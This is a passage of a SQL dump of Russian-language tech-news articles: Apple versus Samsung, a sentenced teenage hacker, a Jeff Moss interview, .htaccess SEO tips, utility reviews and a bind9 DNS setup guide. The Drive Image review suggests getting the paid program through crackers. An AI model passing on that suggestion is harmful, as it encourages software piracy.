ухудшить показатели мобильных гаджетов Apple по просмотрам web-страниц. Поэтому и в следующем году лидерство наверняка останется за Samsung.","Apple сдала позиции перед Samsung","gazeta/img_655624.jpg","1373871816","374");
INSERT INTO gazeta_article VALUES("92","20","Как стало известно , контракт "Вымпелкома" (торговая марка "Билайн") и Apple не был продлен. Ранее прекратили действовать контракты "яблочной" компании с МТС и "МегаФоном", таким образом, на данный момент единственным прямым дистрибутором продукции Apple в России остался ритейлер "Связной". Все российские операторы отказались от сотрудничества с Apple.<br /><br />Одновременно с прекращением сотрудничества с Apple компания "Вымпелком" договорилась о прямых поставках с Samsung - условия у корейцев оказались более выгодными. На позициях Apple сокращение числа партнеров скажется негативно. Сейчас доля iOS в России падает (9.00% в 1 кв 2012, 8.40% в 1 кв 2013).<br /><br />Теперь "Вымпелком" будет активно предлагать в России продукцию Samsung. По условиям прямого контракта оператор может напрямую закупать у корейского производителя любую продукцию, продавать ее в своих салонах по всей России, а также включать ее в эксклюзивные предложения для своих абонентов.<br /><br />Однако прекращение действия договоров Apple с российскими операторами вовсе не означает, что россияне столкнутся с дефицитом "яблочной" продукции. Напомним, 26 июня в России начал работать фирменный онлайн-магазин Apple. Apple Online Store предлагает россиянам приобрести смартфоны, плееры, планшеты, ноутбуки, компьютеры, а также аксессуары к ним. Одно из самых главных достоинств официального онлайн-магазина Apple в России в том, что товары тут появляются одновременно с появлением в других странах.","Оператор "Вымпелком" отказался от Apple","gazeta/img_234459.jpg","1373872381","374");
INSERT INTO gazeta_article VALUES("85","21","15-летний хакер Cosmo, известный также как Cosmo the God («Космо — бог»), участник хакерской группировки UG Nazi, приговорён калифорнийским судом к шести годам лишения интернета.<br />В течение 2012 года Cosmo в составе группы UG Nazi принял участие во множестве акций, получивших широкую известность. Группа UG Nazi была образована в качестве оппозиции скандальному законопроекту SOPA и сразу приступила к активным действиям. Они совершили атаки на несколько веб-сайтов и вывели из строя, в частности, сайты NASDAQ, CIA.gov (сайт ЦРУ) и UFC.com. Они также изменили DNS-запись популярного форума 4Chan, так что всех посетителей перенаправляло на официальный твиттер UG Nazi. Лично Cosmo использовал технику социальной инженерии, чтобы получить доступ к аккаунтам некоторых пользователей на Amazon, PayPal и ряде других сервисов.<br />Cosmo был арестован в июне 2012 года, среди прочих хактивистов во время масштабной операции ФБР.<br />Приговор суда гласит, что Cosmo будет на испытательном сроке до достижения им 21-летнего <br />возраста. До этого момента он может выходить в интернет только с образовательной целью, получив согласие специального должностного лица, надзирающего за условно-досрочно освобождённым. Он должен предоставить список всех устройств с возможностью подключения к интернету, к которым он имеет доступ. Cosmo не имеет права вступать в контакт с кем-либо из участников хакерской группы UG Nazi или движения Anonymous, а также с людьми, перечисленными в дополнительном списке имён.<br />Если Cosmo нарушит любое условие испытательного срока, то он будет помещён в тюрьму на три года.<br />Кто-то может сказать, что подобное условно-досрочное освобождение — довольно мягкое наказание, учитывая количество преступлений, совершённых подростком. С другой стороны, это стандартная практика по отношению к несовершеннолетним при совершении компьютерных преступлений. Некоторые юристы даже высказывают мнение, что для такого одарённого и талантливого юноши лишение интернета на шесть лет — это слишком жестоко. Подобное наказание может коренным образом повлиять на судьбу человека.<br />P.S. Статья для школьников, ЗАДУМАЙТЕСЬ","хакер Cosmo","gazeta/img_324192.png","1373490188","3");
INSERT INTO gazeta_article VALUES("86","15","Недавно выдалась возможность пообщаться с Джеффом Моссом, который приезжал в Москву для выступления на RIGF. Если вы не знаете, кто это такой (как и я не знал неколько дней назад), то описать можно двумя словами — крутой чувак. Понимаю, что многим этого недостаточно, поэтому вот данные из кеддропедии.<br />Джеф Мосс — в прошлом известный хакер, основатель хакерских конференций Black Hat и Defcon. Имеет степень бакалавра по уголовному судопроизводству университета Гонзага. Занимал руководящие посты в компаниях Secure Computing и Ernst & Young. Входит в состав консультационного совета по вопросам национальной безопасности США, а также занимается консультациями по обеспечению безопасности компьютерных сетей организаций. С мая 2011 года — вице-президент ICANN по вопросам кибербезопасности.<br />Основные компетенции:<br />компьютерная безопасность, существующие кибер-угрозы и способы защиты;<br />философия группировок хакеров, в частности, международной группы «Anonymous»;<br />Фотография Джеффа наверху.<br />Лекция Джеффа на RIGF была весьма любопытной, но пересказывать я ее не буду. Гораздо интересней было пообщаться лично. К сожалению, много вопросов задать не удалось, поскольку сразу после выступления Джеффа утащил на разговор министр связи и массовых коммуникаций России Игорь Щеголев («Вот щегол!», — промелькнуло у меня тогда в голове). Но диалог, хоть и небольшой, все же вышел.<br />Я. Джефф, сейчас Вы работаете в структуре, которая должна обеспечивать защиту от киберугроз. В прошлом Вы были хакером. Что заставило Вас перейти, так скажем, на светлую сторону?<br />Д.М. А я всегда был на светлой стороне.<br />Раньше это было комплиментом, когда тебя называли хакером. Это означало, что ты обладаешь знаниями, которые позволяют тебе делать что-то, что другие не умеют. А потом появились злоумышленники и они стали совершать организованные преступления. В результате произошло заимствование терминов. Вместо того, чтобы называть этих людей компьютерными преступниками, их стали называть хорошим словом хакеры.<br />Для меня хакер, если хотите, это набор навыков и умений. Но намерения не входят в понятие этого слова. Его подпортили, и теперь начинают говорить про белых хакеров, черных хакеров, пытаясь добавить в смысл то самое намерение.<br />Товарищи старой школы все еще продолжают называть себя хакерами, подразумевая хорошее. А вот молодежь уже называет себя компьютерными специалистами.<br />Я. Приходилось ли применять свои умения в корыстных целях любого масштаба?<br />Д.М. Денег никогда не зарабатывал. Ну, во-первых, надо понимать, что на заре Интернета в сети не хранилось ничего, что имело бы смысл воровать. И этика была такая – глазками смотрим, ручками не трогаем. Если из новостей узнавали, что приятеля загребли, значит, он эту этику нарушил.<br />Кроме того, когда я был молодым, не было никакого законодательства, запрещающего хакерство. Поэтому, мне, в общем-то, повезло. Я мог ошибаться, но реальных проблем на свою голову навлечь не мог.<br />А сейчас меня очень беспокоит судьба молодежи, потому что наказания и штрафы за одно скачивание хакерского инструмента, чтобы поиграть и попробовать, такие серьезные, что это может сломать всю твою жизнь.<br />Я. Джефф, Вы говорили, что на сегодня самой опасной киберугрозой являются ботнет-сети. Cразу вспоминается недавняя история с компаниями Apple и Dr.Web. Можно ли назвать эту ситуацию первым звоночком для купертиновской команды? Насколько это опасно для «яблочников»?<br />Д.М. Это первая распиаренная история, связанная с безопасностью Apple. То есть, их предупреждали-предупреждали, и теперь это реально начинает реализовываться. Там, по-моему, около 600 тысяч ботнет-узлов было зафиксировано. Игнорировать такой масштаб невозможно.<br />Что произошло на самом деле, как мне кажется: Apple дошла до 6-7% рынка. Это большая доля, теперь имеет смысл на них покушаться.<br />Я. А у Вас какой компьютер? Mac или PC?<br />Д.М. У меня PC, а у жены Mac.<br />Я. Есть ли смысл обыкновенным людям, не компаниям, пытаться обезопасить себя от киберугроз? Если да, то назовите три самых простых способа сделать это.<br />Д.М. Беспокоиться следует.<br />Дам один совет. Если вам надо что-то сделать в браузере, какие-то финансовые, банковские операции, то открываете отдельное окно браузера, делаете то, что надо и закрываете его. Зачастую все проблемы от незакрытых окошек с банковскими операциями.<br />Я. На Вашем выступлении Вы периодически подсматривали в блокнот. Ни в планшет, ни в смартфон, а в блокнот. Это из соображений безопасности?<br />Д.М. Да нет. На бумажке просто удобно рисунки делать: кружочки, стрелочки, диаграммы. Я не параноик. Но банковскими услугами в сети не пользуюсь.<br />Я. Что подталкивает хакеров заниматься своим делом: корыстные цели, тщеславие, скука или что-то еще?<br />Д.М. Я думаю, что основная задача – это вызов. Ну, и частично покрасоваться, конечно.<br />В моей молодости, например, я не мог позволить себе более дорогой компьютер. И мне пришлось его хакнуть. Просто, чтобы он быстрее заработал. А в детстве у меня были деньги только на одну видеоигру, а у друга была другая видеоигра, и она была защищена от копирования… В общем, пришлось научиться копировать игры.<br />Думаю, что есть еще альтруистичные хакеры, которые дают людям доступ к чему-либо. На самом деле, мотиваций может быть много.<br />Я. Если бы Вас попросили заняться кибер безопасностью в России на государственном уровне, предложили бы соответствующий пост, то с чего бы Вы начали? Какие бы были первые шаги?<br />Д.М. Для начала нужно оценить размер проблемы. Я бы ввел закон, который всех бы обязывал сообщать о случаях атак. То есть, если вашу компанию атаковали, то вы ОБЯЗАНЫ написать отчет государству. Может быть открытого публичного оповещения и не надо, чтобы не подвергать свою репутацию риску, но государству надо сообщать. Такой подход дал бы компаниям возможность как бы объединиться, не раскрывая своей информации о клиентах. Защищены лучше всего те, кто делится данными с другими. Такой обмен позволяет понять, что работает, а что нет в борьбе с кибер преступностью. Соответственно, набрав такой информации: о типах атак, как часто они возникают, уже можно выстраивать защиту.<br />Я. А если бы это была не Россия, а Украина, например, подход был бы точно такой же?<br />Д.М. В принципе, да.<br />Такая координация помогла бы вообще во многих областях нашей жизни. Страховые компании смогли бы взять на себя обязательства по страхованию от кибератак. Сейчас им просто не на что опираться. Нет информации, которая помога бы им сделать расчеты.<br />Как я говорил, если бы я стал Королем Интернета на один день, я бы точно издал указ, чтобы все регуляторы всех стран в Интернете ввели стандарты. Такие «гигиенические» правила, простейшие вещи, но чтобы они были стандартными.<br />Я. Допустим, Вы знаете адрес моего почтового ящика. Сколько времени Вам понадобиться, чтобы получить доступ к моим письмам?<br />Д.М. А у меня есть на то причина?<br />Вообще, конечно, все зависит от вашего сервера, определяет ли он мои попытки угадать пароль.<br />Я. Самый быстрый вариант?<br />Д.М. Пять минут. Я отправлю вам письмо с вредным приложением.<br />Я. Спасибо!<br />Д.М. Спасибо!","Интервью у Джеффа Моссома","gazeta/img_864418.png","1373490701","3");
INSERT INTO gazeta_article VALUES("88","21","тестестстстстс","статья с названиемм","gazeta/img_934468.jpeg","1373647636","1");
INSERT INTO gazeta_article VALUES("94","20","Трагический случай произошел в Китае. Информационное агентство Синьхуа сообщило о том, что 23-летняя девушка погибла от удара током во время разговора по своему iPhone 5.<br />О случившемся рассказала сестра погибшей в своем микроблоге. По ее словам девушка погибла от удара электрического тока, начав разговор по телефону, который стоял в зарядке. <br /><br />Сестра утверждает, что девушка приобрела iPhone 5 в официальном магазине Apple в декабре прошлого года и пользовалась исключительно оригинальным зарядным устройством. "Я надеюсь, что компания Apple объяснит, как такое могло произойти." — написала родственница погибшей в микроблоге. Ее сообщение было процитировано более 3000 раз.<br /><br />Местная полиция пока не подтвердила, что причиной смерти мог стать смартфон Apple — лишь констатирован факт смерти от удара электрическим током. Некоторые эксперты уверены, что сам смартфон не мог стать причиной смерти, так как 3-5 вольт недостаточно для того, чтобы принести хоть какой-то ущерб здоровью, но, вероятно, дело может быть в поврежденном блоке питания или кабеле.<br /><br />Тем не менее сестра погибшей девушки собирается добиваться справедливости от американской компании. Apple уже отреагировала на случившееся и пообещала "тщательно расследовать" обстоятельства трагедии, тесно сотрудничая с полицией.<br /><br />Напомним, что современные гаджеты время от времени становятся причиной несчастных случаев. Правда, как правило, зачастую проблемы связаны с аккумуляторами. К примеру, недавно взорвавшийся в кармане джинсов девушки Samsung Galaxy S III нанес серьезный урон здоровью.","Apple Iphone убил девушку током","gazeta/img_484884.jpg","1373875718","374");
INSERT INTO gazeta_article VALUES("96","21","1. Главная страница без дублей<br />Обычно код главной страницы<br />физически расположен в файле /<br />index.html (или index.php – для<br />большинства динамических сайтов),<br />но сайт должен открываться по любому из запросов: yoursite.ru,<br />yoursite.ru/index.html, www.yoursite.ru<br />и www.yoursite.ru/index.html. Но для<br />поисковых систем это четыре разных<br />URL! Если не настроить .htaccess<br />верно, поисковик добавит в свой индекс четыре одинаковых страницы.<br />Это признак некачественного сайта.<br />Избежать этой проблемы можно с<br />помощью такого кода в .htaccess:<br />Options +FollowSymLinks<br />RewriteEngine on RewriteCond %{HTTP_HOST}<br />^yoursite.ru<br />RewriteRule (.*) http:// www.yoursite.ru/$1 [R=301,L] RewriteCond %{THE_REQUEST} ^[A-Z]<br />{3,9}\ /index\.html\ HTTP/<br />RewriteRule ^index\.html$ http:// www.yoursite.ru/ [R=301,L] Все страницы-дубли будут склеены<br />редиректом с кодом 301<br />(«постоянное перемещение») с<br />главной страницей – http:// www.yoursite.ru/. Перед этим, конечно, нужно проверить, как<br />«Яндекс» проиндексировал сайт – с<br />www или без. Желательно также<br />назначить совпадающее основное<br />зеркало в файле robots.txt.<br />2. Строгий URL страницы 404 Чтобы убедиться, что сервер будет<br />выдавать именно ту страницу 404,<br />которую вы подготовили и создали, а<br />не служебную или какую-либо еще,<br />добавьте такую строчку:<br />ErrorDocument 404 http:// www.yousite.ru/404.php Аналогично можно указать страницы<br />и для других ошибок.<br />3. Постраничный и групповой<br />редиректы<br />Перенаправить с одной страницы на<br />другую можно с помощью директивы Redirect:<br />Redirect 301 /old.html http:// www.yoursite.com/new.html Для группового редиректа нужно<br />использовать RedirectMatch – эта<br />команда маски URL и имен файлов.<br />4. Сохранение файлов вместо<br />открытия<br />Многие видели, как при попытке скачать архив с расширением .rar<br />браузер открывает его в виде<br />простого текста из мешанины<br />символов. Это значит, что на сервере<br />сайта не настроено принудительное<br />сохранение типов файлов, которые не должны открываться в браузере.<br />AddType application/octet-<br />stream .rar .doc .mov .avi .pdf .xls .mp4<br />Можно добавить и другие<br />расширения.<br />5. Настройка ЧПУ (человекупонятных URL)<br />Настоятельно рекомендуем<br />использовать настройки, которые<br />предоставляет ваша CMS. Собственно,<br />непонятные длинные URL возникают<br />только при использовании CMS (на статическом сайте их не бывает).<br />Следовательно, используйте<br />настройки и модули CMS для<br />настройки – во всех современных<br />движках такие возможности есть.<br />Для их корректной работы в .htaccess должна быть строчка RewriteEngine<br />On (включение mod_rewrite).<br />Настройка же ЧПУ с помощью<br />«голого» .htaccess – дело достаточно<br />кропотливое. Например, чтобы<br />превратить URL типа www.yoursite.ru/ script.php?tv=123 в более понятный<br />www.site.ru/samsung/tv/123/, пишем<br />вот такие строчки (RewriteEngine On<br />нужно писать в том случае, если<br />раньше в .htaccess mod_rewrite еще<br />не был подключен): RewriteEngine on<br />RewriteRule samsung/(.*)/(.*)/$ /<br />script.php?$1=$2<br />Понятно, что для успешной<br />настройки ЧПУ таким способом нужно<br />освоить весь синтаксис .htaccess и немало потрудиться. Гораздо проще,<br />повторимся, пользоваться средствами<br />CMS.<br />6. Дубли страниц без слэша в конце<br />URL<br />Чтобы предотвратить ситуацию с индексированием страниц<br />www.yoursite.ru/about и<br />www.yoursite.ru/about/ как разных,<br />ставим следущий код:<br />RewriteCond %{REQUEST_FILENAME} !-f<br />RewriteCond %{REQUEST_URI} !(.*)/$ RewriteRule ^(.*)$ /$1/ [R=301,L]<br />Со страниц без слэша будет<br />установлен редирект на «слэшевые».","Настройка сервера для оптимизации<br />в SEO","gazeta/img_570500.png","1375035011","4");
INSERT INTO gazeta_article VALUES("100","19","При работе на компьютере много<br />времени теряется из-за того, что<br />человек, не в состоянии эффективно<br />использовать одновременно два<br />устройства ввода: клавиатуру и<br />мышь. Полной отдачи не получается. В этой ситуации очень помогает<br />знание зарезервированных<br />комбинаций клавиш, как в<br />операционной системе, так и в<br />различных программах. Например, в<br />Windows вместо того чтобы щелкать мышью Пуска НайтиаФайл и папки,<br />можно нажать комбинацию Win+F.<br />Или в Microsoft Word для<br />форматирования текста можно<br />нажимать Ctrl+B, Ctrl+I, Ctrl+U. В<br />результате получим жирный, наклонный или подчеркнутый текст…<br />Знание комбинаций существенно<br />упрощает работу, ускоряет её. Но<br />часто необходимо пойти еще дальше.<br />Например, назначить свои<br />комбинации для выполнения каких- либо операций не являющихся<br />стандартными. В таких случаях может<br />помочь программа WireKeys [http:// www.wiredplane.com/]. Программа достаточно компактна.<br />Будучи установленной, она занимает<br />на жёстком диске меньше мегабайта,<br />а в оперативной памяти - около двух<br />мегабайт. Сразу после установки<br />WireKeys назначает по умолчанию комбинации клавиш для самых<br />распространенных действий, таких<br />как выключение компьютера, его<br />перезагрузка, включение хранителя<br />экрана. Назначаются также<br />комбинации для быстрого запуска браузера по умолчанию и почтовой<br />программы.<br />Возможности программы просто<br />огромны. Причём получить доступ к<br />ним вы можете не только через<br />комбинации клавиш, но и щелкнув правой кнопкой на значке<br />программы в систрее. Вы можете<br />управлять приложениями:<br />сворачивать их в систрей, менять им<br />статус "Поверх всех окон", полностью<br />скрывать их… Мне понравилась очень интересная<br />возможность. Она называется<br />"Красная кнопка". Суть её действия в<br />следующем. Вы резервируете какую-<br />либо комбинацию клавиш, и после<br />её нажатия с экрана убираются все, или отобранные по маске<br />заголовков, открытые приложения,<br />а на экран выводится заранее<br />сделанный скриншот (копия экрана).<br />Теперь можно заниматься чем-либо<br />запрещённым, например играть на работе или дома, когда вам это<br />запрещают. Главное - успеть нажать<br />потом нужную комбинацию.<br />К уже предложенным комбинациям и<br />задачам, которые выполняются по их<br />нажатию, вы всегда можете добавить свои. А ещё программа<br />позволяет управлять WinAmp`ом с<br />клавиатуры. Добавить или<br />уменьшить громкость - тоже для<br />WireKeys не проблема. Причем можно<br />даже задать степень изменения громкости при однократном нажатии<br />выбранной комбинации.<br />Кроме того, эта программа позволяет<br />работать с выделенным текстом,<br />например поменять раскладку или<br />регистр. Поддерживается также несколько<br />буферов обмена. Причём можно<br />просмотреть историю работы с<br />каждым из них.<br />Очень удобно реализована<br />возможность снятия скриншотов (снимков экрана). WireKeys позволяет<br />задать тип сохраняемого рисунка,<br />степень сжатия, каталог назначения,<br />может даже вставить в рисунок дату<br />и время создания. Можно даже<br />делать снимки с заданной области экрана.<br />Но и это еще не всё. WireKeys может<br />работать ускорителем приложений.<br />Ускорители Интернета знают,<br />наверное, все. А вот ускорители<br />приложений - пока ещё редкость. Между тем принцип их работы очень<br />прост и эффективен. Большинство<br />ресурсов процессора отдается<br />активному приложению. Для<br />активного приложения можно<br />задать один из трех приоритетов: высокий, выше нормы и realtime.<br />Теперь любимые игры будут меньше<br />тормозить. Также программа<br />обладает достаточно удобным<br />менеджером процессов, который<br />позволяет одним щелчком мыши удалить зависшее приложение. Он<br />же позволяет освободить память,<br />выгрузив все не используемые DLL из<br />оперативной памяти вашего ПК.<br />Ко всему прочему эта программа<br />бесплатна. Поэтому рекомендуется всем.","Есть ли жизнь без мыши?","gazeta/img_515406.png","1375056026","4");
INSERT INTO gazeta_article VALUES("101","19","Windows - бессмертна? Сейчас многие не поверят, и скажут -<br />неправда! Но почему бы из фантазий<br />не сделать реальность? Да! С<br />помощью некоторых программ это<br />почти возможно. Сейчас я опишу<br />одну из них. Это Drive Image. Drive Image<br />Вообще-то сделать Windows<br />бессмертной не может ни кто! Но вот<br />восстановить за короткий срок не<br />проблема.<br />С помощью этой программы можно создавать образ диска, который<br />можно уплотнить в два раза, а потом<br />восстановить. Все операции делаются<br />через DOS. Также эта программа<br />обладает достаточной скоростью.<br />Здесь краткий процесс создания образа диска, а также его<br />восстановления:<br />1. Вначале создаётся образ диска с<br />определёнными параметрами:<br />Степень сжатия, выбор диска и<br />подобные параметры. Лучше всего создавать образ на другой диск<br />(особенно физический). Это делается<br />на случай выхода из строя, вирусной<br />атака, появления сбойных секторов и<br />других подобных ситуаций. При<br />создание образа не рекомендую создавать его в папке с русскими<br />именами, и так же не следует<br />называть файл русскими буквами.<br />2. Хранить сам образ лучше на<br />болванке (CD). Но можно и также на<br />самом винчестере, но шанс испортится немного больше.<br />3. Процесс восстановления несложен,<br />а его скорость напрямую зависит от<br />размера файла, скорости винчестера<br />и системы в целом. Файл в 2<br />гигабайта (винчестер 5400 об/сек) восстановился всего за 15 минут,<br />несложно представить, а сколько<br />понадобится на установку ОС,<br />программ, но а также<br />восстановления настроек, паролей,<br />системы и разных программ. Лично я пользуюсь этой программой<br />и сейчас, и честно сказать не знаю,<br />как обходился без неё раньше!<br />Рекомендую попробовать, хотя она и<br />платная, но разве это проблема,<br />умельцы найдутся всегда. Вот тут сайт производителя<br />программы: http://www.powerquest.com/ Этаже фирма выпустила Partition<br />Magic, которая предназначена для<br />разбития диска на логические<br />разделы.<br />Рекомендую, ведь теперь Windows<br />бессмертна.","Windows - бессмертна?","gazeta/img_428679.png","1375056330","4");
INSERT INTO gazeta_article VALUES("102","19","Ситуация в корне изменилась, когда<br />американский программист Шейн<br />Брукс (Shane Brooks) разработал и<br />выпустил на рынок программный<br />продукт, получивший название<br />Windows 98 Lite ... Вскоре после выхода на рынок<br />операционной системы Microsoft<br />Windows 98 пользователи, уже<br />привыкшие к достаточно<br />компактным размерам Windows 95,<br />были изрядно разочарованы, совершенно неожиданно для себя<br />обнаружив в комплекте поставки<br />обновленной ОС множество<br />дополнительных компонент, которые<br />не только бестолково расходовали<br />дисковое пространство и ресурсы оперативной памяти, но и<br />существенно снижали<br />производительность персонального<br />компьютера в целом. Причем<br />большую часть этих «дополнений»<br />было практически невозможно удалить, не нарушив<br />работоспособность всей системной<br />платформы, вследствие чего с их<br />существованием до поры до времени<br />приходилось мириться. Ситуация в<br />корне изменилась, когда американский программист Шейн<br />Брукс (Shane Brooks) разработал и<br />выпустил на рынок программный<br />продукт, получивший название<br />Windows 98 Lite, о котором я уже<br />подробно писал в одной из своих публикаций несколько лет назад —<br />эту статью вы можете найти в<br />Интернете по адресу http:// www.holmogorov.ru/publications/?<br />part_id=3&article_id=167. Кратко резюмируя принцип работы<br />данной программы, напомню, что<br />пользователь должен был<br />скопировать ее в содержащую<br />дистрибутив Windows 98 папку и<br />запустить на исполнение. После этого программа перехватывала<br />управление процессом установки<br />Windows и в ходе инсталляции<br />операционной системы корректно<br />удаляла из ее состава указанные<br />пользователем компоненты, например, поддержку Active Desktop<br />или браузер Microsoft Internet<br />Explorer.<br />Спустя некоторое время на сайте<br />разработчика появились новые<br />версии данного продукта, совместимые с операционными<br />системами Windows 98 SE и Windows<br />Millennium Edition, программа<br />получила многоязычный интерфейс,<br />причем одним из поддерживаемых<br />Windows 98 Lite языков был русский. Однако с появлением Windows 2000 и<br />Windows XP упомянутая линейка ОС<br />стала постепенно вытесняться NT-<br />совместимыми платформами,<br />«облегченной» версии которых на<br />тот момент не существовало. Приблизительно полтора года назад,<br />когда корпорация Microsoft<br />официально объявила о<br />прекращении дальнейших<br />разработок операционных систем<br />семейства Windows 9x/ME, Шейн Брукс разместил на своей страничке<br />сообщение о том, что в ближайшем<br />будущем он представит на суд<br />благодарной публики вариант<br />собственной программы для Windows<br />2000/XP. Вместе с тем, его исследования в этой области<br />растянулись более чем на год, и<br />первая бета-версия XP Lite появилась<br />на сервере http://www.litepc.com лишь в июле 2003 года. Ожидается,<br />что финальный релиз XP Lite будет<br />окончательно готов к сентябрю, пока<br />же мы можем оценить достоинства и<br />недостатки лишь предварительного<br />издания этого приложения. Бета-версия XP Lite поставляется в<br />виде исполняемого файла, который<br />не требует установки и может быть<br />запущен непосредственно после<br />извлечения его из архива. Основным<br />отличием XP Lite от реализации данной программы для Windows 98/<br />ME является то, что это приложение<br />следует использовать не в процессе<br />установки операционной системы, а<br />после ее завершения. Нажатием<br />одной кнопки в окне программы XP Lite можно отключить систему<br />защиты файлов Windows XP/2000<br />(Windows File Protection), благодаря<br />чему вы получаете неограниченный<br />доступ ко множеству «тонких»<br />настроек ОС. В этом, кстати, кроется еще одно несомненное достоинство<br />XP Lite по сравнению с ее<br />«предшественницами»: в любой<br />момент времени пользователь может<br />вновь включить Windows File<br />Protection, и, выполнив процедуру аварийного восстановления системы<br />посредством стандартной утилиты<br />System Restore, вернуть все настройки<br />Windows в их первоначальное<br />положение.<br />На основной вкладке приложения — Add/Remove Components —<br />пользователь может удалить из<br />состава операционной системы те ее<br />компоненты, которые при обычных<br />условиях не отображаются в окне<br />стандартного апплета Панели управления «Установка и удаление<br />компонент Windows» , и,<br />следовательно, уничтожить которые<br />по умолчанию невозможно. Среди<br />них следует назвать поставляемые<br />вместе с системой экранные заставки, шрифты, игры, звуковые файлы, а<br />также такие приложения, как<br />Windows Messenger, MSN Explorer,<br />Windows Movie Maker, Paint, WordPad<br />и многие другие. Иными словами, XP<br />Lite — это не альтернативная программа установки Windows,<br />изменяющая базовую структуру ОС<br />еще на этапе извлечения файлов из<br />дистрибутива, а всего лишь<br />несложная утилита для «тюнинга»<br />Windows 2000/XP, позволяющая удалить из системы ряд редко<br />используемых модулей и сэкономить<br />на этом определенный объем<br />дискового пространства. Весьма<br />удивительным мне показалось лишь<br />то обстоятельство, что Шейн Брукс затратил на разработку этого<br />приложения так много времени, хотя<br />практически идентичного результата<br />можно добиться, немного подправив<br />всего лишь один-единственный<br />системный файл Windows, о чем я уже писал в своей заметке<br />«Виртуальное обрезание Windows<br />XP» (http://www.holmogorov.ru/ publications/?part_id=3&article_id=199 ) примерно год назад.<br />К сожалению, долгожданный<br />предварительный релиз XP Lite не<br />позволяет автоматически выполнять<br />такие полезные для настройки<br />операционной системы процедуры, как автоматическое управление<br />размером кэша библиотек, или<br />отключение запускающихся в<br />процессе загрузки Windows сервисов,<br />благодаря чему можно заметно<br />экономить оперативную память и существенно повысить<br />производительность системы. А это<br />не может не разочаровывать. Что ж,<br />о том, как «бороться» с сервисами<br />Windows XP, я расскажу вам в одной<br />из своих следующих публикаций, мы же тем временем подождем<br />финальной версии данной<br />программы. Будем надеяться, что<br />разработчики смогут заметно<br />расширить ее возможности,<br />благодаря чему XP Lite станет гораздо более удобным и полезным<br />инструментом для настройки ОС.","MICROSOFT WINDOWS XP LITE -<br />надежды и разочаровани","gazeta/img_772283.png","1375056444","4");
INSERT INTO gazeta_article VALUES("98","21","Mini HOWTO пo ycтaнoвкe и нacтpoйкe<br />DNS cepвepa bind9 Ubuntu-Debian<br />Пoexaли!<br />Код:<br />aptitude install bind9<br />(можно конечно и apt-get - но aptitude, как мне показалось, лучше<br />справляется с зависимостями )<br />Из cooбpaжeний бeзoпacнocти лyчшe<br />зaпycкaть Bind в chroot cpeдe, для<br />этoгo пpoдeлaйтe нecкoлькo пpocтыx<br />oпepaций. (возможно настраивать чрут и не придется - в последних<br />версиях бинд чрутится при установке<br />сам)<br />останавливаем бинд:<br />Код:<br />/etc/init.d/bind9 stop Редактируем фaйл /etc/default/bind9 ,<br />тyдa нaдo дoбaвить cтpoкy o cpeдe<br />chroot кoтopaя бyдeт нaxoдитcя y нac<br />в /var/lib/named.<br />Измeнитe cтpoкy OPTIONS=" -u bind" нa<br />OPTIONS="-u bind -t /var/lib/named" Кoд:<br />Код:<br />nano /etc/default/bind9<br />Фaйл пocлe paдaктиpoвaния дoлжeн<br />выглядeть тaк:<br />Кoд: OPTIONS="-u bind -t /var/lib/named"<br /># Set RESOLVCONF=no to not run<br />resolvconf<br />RESOLVCONF=yes<br />Создаем директории:<br />Код: mkdir -p /var/lib/named/etc<br />mkdir /var/lib/named/dev<br />mkdir -p /var/lib/named/var/cache/<br />bind<br />mkdir -p /var/lib/named/var/run/bind/<br />run Копируем все из /etc в /var/lib/named/<br />etc:<br />Код:<br />mv /etc/bind /var/lib/named/etc<br />Coздaдаем cимвoличecкyю ccылкy нa<br />нoвyю диpeктopию: Кoд:<br />Код:<br />ln -s /var/lib/named/etc/bind /etc/bind<br />Coздaем null и random дeвaйcы,<br />выcтaвляем пpaвильныe пpaвa нa<br />диpeктopии: Код:<br />mknod /var/lib/named/dev/null c 1 3<br />mknod /var/lib/named/dev/random c 1<br />8<br />chmod 666 /var/lib/named/dev/null /<br />var/lib/named/dev/random chown -R bind:bind /var/lib/named/var/<br />*<br />chown -R bind:bind /var/lib/named/etc/<br />bind<br />Редактируем cтapтoвый cкpипт<br />дeмoнa sysklogd для тoгo чтo бы cooбщeния bind пoпaдaли в syslog.<br />Редактируем /etc/init.d/sysklogd,<br />мeняем cтpoкy<br />SYSLOGD="-u syslog" нa<br />SYSLOGD="-u syslog -a /var/lib/named/<br />dev/log" nano /etc/init.d/sysklogd<br />Cтpoкa дoлжнa выглядeть тaк:<br />SYSLOGD="-u syslog -a /var/lib/named/<br />dev/log"<br />Пepeзaпycкаем sysklogd<br />Код: /etc/init.d/sysklogd restart<br />Зaпycкаем bind9<br />Код:<br />/etc/init.d/bind9 start<br />проверяем лог файл нa нaличиe<br />oшибoк !Ёще раз повторюсь, что настраивать<br />запуск bind в чруте возможно и не<br />придется.<br />Если было сделано все правильно -<br />тo oшибoк быть нe дoлжнo.<br />Тeпepь мoжнo пpиcтyпaть к нacтpoйкe зoны для нaшeгo дoмeнa,<br />нaпpимep oops.com<br />Coздaем фaйл кoнфигypaции:<br />Кoд:<br />Код:<br />touch /var/lib/named/etc/bind/ oops.conf<br />chown bind:bind /var/lib/named/etc/<br />bind/oops.conf<br />nano /var/lib/named/etc/bind/<br />named.conf<br />В кoнeц фaйлa добавляем cтpoкy include "oops.conf";<br />Получается:<br />include "/etc/bind/named.conf.local";<br />include "/etc/bind/oops.conf";<br />Тeпepь oтpeдaктиpyeм фaйл<br />кoнфигypaции нaшиx зoн и дoбaвим тyдa зoнy для дoмeнa oops.com.<br />Кoд:<br />Код:<br />nano /var/lib/named/etc/bind/<br />oops.conf<br />Впишитe в фaйл cлeдyющee coдepжимoe<br />zone "oops.com" {<br />type master;<br />file "oops.com";<br />};<br />Coздaем фaйл нaшeй зoны oops.com, выcтaвить нa нeгo пpaвa и<br />oтpeдaктиpoвaть eгo.<br />Кoд:<br />Код:<br />touch /var/lib/named/etc/bind/<br />oops.com chown bind:bind /var/lib/named/etc/<br />bind/oops.com<br />nano /var/lib/named/etc/bind/<br />oops.com<br />$ORIGIN oops.com.<br />$TTL 86400 ; 1 day @ IN SOA localhost. root.localhost. (<br />2010012501 ; serial<br />10800 ; refresh (3 hours)<br />900 ; retry (15 minutes)<br />604800 ; expire (1 week)<br />86400 ; minimum (1 day) )<br />@ IN NS localhost.<br />@ IN A 192.168.1.2<br />www IN CNAME oops.com.<br />перечитываем конфиг:<br />Код: rndc reload<br />проверяем отрабатывает ли наш ДНС:<br />Код:<br />nslookup oops.com 127.0.0.1<br />Вы дoлжны yвидeть пpимepнo<br />cлeдyющee Кoд:<br />Server: 